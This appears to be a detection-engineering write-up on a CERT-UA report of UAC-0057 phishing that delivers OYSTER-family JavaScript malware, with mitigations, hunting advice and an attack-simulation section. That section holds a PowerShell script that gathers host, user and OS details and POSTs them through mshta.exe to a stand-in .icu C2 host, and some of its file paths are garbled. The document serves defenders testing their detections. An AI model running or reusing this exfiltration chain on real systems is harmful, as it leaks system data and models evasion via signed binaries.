UAC-0057 Updates Its Toolkit with OYSTERFRESH, OYSTERSHUCK, and OYSTERBLUES

Summary

CERT-UA has reported a phishing campaign aimed at Ukrainian government organizations. The emails contain PDF attachments that redirect recipients to ZIP archives carrying malicious JavaScript files known as OYSTERFRESH, OYSTERSHUCK, and OYSTERBLUES. Once executed, the malware gathers system information and sends it out through HTTP POST requests, with the option to retrieve a Cobalt Strike component at a later stage. The supporting infrastructure is concealed behind Cloudflare and makes extensive use of .icu domains.

Investigation

CERT-UA’s analysis identified the malicious JavaScript samples, the decoding methods they rely on, including string reversal, ROT13, and URL decoding, and the registry changes used to maintain persistence. Investigators also documented multiple file artifacts and Windows paths associated with the infection chain. Network analysis linked the activity to Cloudflare-protected .icu hosting infrastructure. The report further notes the possible follow-on delivery of a Cobalt Strike beacon.

Mitigation

Organizations should restrict wscript.exe execution for standard users, limit both PowerShell and JavaScript execution, and monitor the listed registry Run keys for suspicious changes. Web filtering should be used to block .icu domains and, where appropriate, Cloudflare-related IP ranges associated with the campaign. Defenders should also apply least-privilege controls and prevent automatic execution of unknown binaries.

Response

Security teams should create detections for the identified filenames, registry keys, and outbound HTTP POST traffic to the known domains. Hunting should also cover the possible Cobalt Strike payload, including the CSBEACON DLL, and any scheduled task named MicrosoftEdgeUpdateTaskMachine. Endpoint investigations should collect process trees to trace the JavaScript decoding and execution chain.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the TTPs identified and produce the exact telemetry expected by the detection logic.

• Attack Narrative & Commands:
  The adversary leverages a signed Windows binary (mshta.exe) to run a small JavaScript payload that collects system information and exfiltrates it via an HTTP POST to a malicious “*.icu” domain controlled by the C2 server. This “living‑off‑the‑land” approach avoids raising AV alerts while generating the exact firewall event the rule monitors (POST + “.icu”).

• Regression Test Script:

  # OYSTERBLUES‑style exfiltration simulation
  # 1. Encode minimal system info in JSON
  $info = @{
      hostname = $env:COMPUTERNAME
      user     = $env:USERNAME
      os       = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
  } | ConvertTo-Json -Compress
  
  # 2. Write a temporary HTML file that runs a JS fetch POST
  $htmlPath = "$env:TEMPexfil.html"
  $js = @"
    var data = '$info';
    fetch('http://malicious-c2.abc.icu/collect', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: data
    });
  "@
  Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII
  
  # 3. Execute via mshta (signed binary proxy execution)
  Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`""
  
  # 4. Give the request time to complete then clean up
  Start-Sleep -Seconds 5
  Remove-Item -Path $htmlPath -Force

• Cleanup Commands:

  # Ensure any lingering mshta processes are terminated
  Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
  
  # Remove residual temporary files (if any)
  $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html"
  foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }